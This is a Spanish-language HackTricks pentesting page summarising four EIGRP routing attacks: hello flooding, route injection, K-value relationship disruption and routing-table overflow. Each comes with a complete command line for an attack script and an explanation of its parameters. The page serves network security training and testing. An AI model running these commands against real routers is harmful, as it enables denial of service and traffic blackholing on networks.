EIGRP Attacks
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Este es un resumen de los ataques expuestos en https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Revísalo para más información.
Objetivo: Sobrecargar las CPU de los routers inundándolos con paquetes hello de EIGRP, lo que podría llevar a un ataque de Denegación de Servicio (DoS).
Herramienta: Script helloflooding.py.
Ejecución: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parámetros:
--interface
: Especifica la interfaz de red, p. ej., eth0
.
--as
: Define el número de sistema autónomo de EIGRP, p. ej., 1
.
--subnet
: Establece la ubicación de la subred, p. ej., 10.10.100.0/24
.
Objetivo: Interrumpir el flujo de tráfico de red inyectando una ruta falsa, llevando a un agujero negro donde el tráfico se dirige a un destino inexistente.
Herramienta: Script routeinject.py.
Ejecución: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parámetros:
--interface
: Especifica la interfaz del sistema del atacante.
--as
: Define el número de AS de EIGRP.
--src
: Establece la dirección IP del atacante.
--dst
: Establece la IP de la subred objetivo.
--prefix
: Define la máscara de la IP de la subred objetivo.
Objetivo: Crear interrupciones y reconexiones continuas dentro del dominio de EIGRP inyectando valores K alterados, resultando efectivamente en un ataque de DoS.
Herramienta: Script relationshipnightmare.py.
Ejecución: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parámetros:
--interface
: Especifica la interfaz de red.
--as
: Define el número de AS de EIGRP.
--src
: Establece la dirección IP de un router legítimo.
Objetivo: Forzar la CPU y RAM del router inundando la tabla de rutas con numerosas rutas falsas.
Herramienta: Script routingtableoverflow.py.
Ejecución: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parámetros:
--interface
: Especifica la interfaz de red.
--as
: Define el número de AS de EIGRP.
--src
: Establece la dirección IP del atacante.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)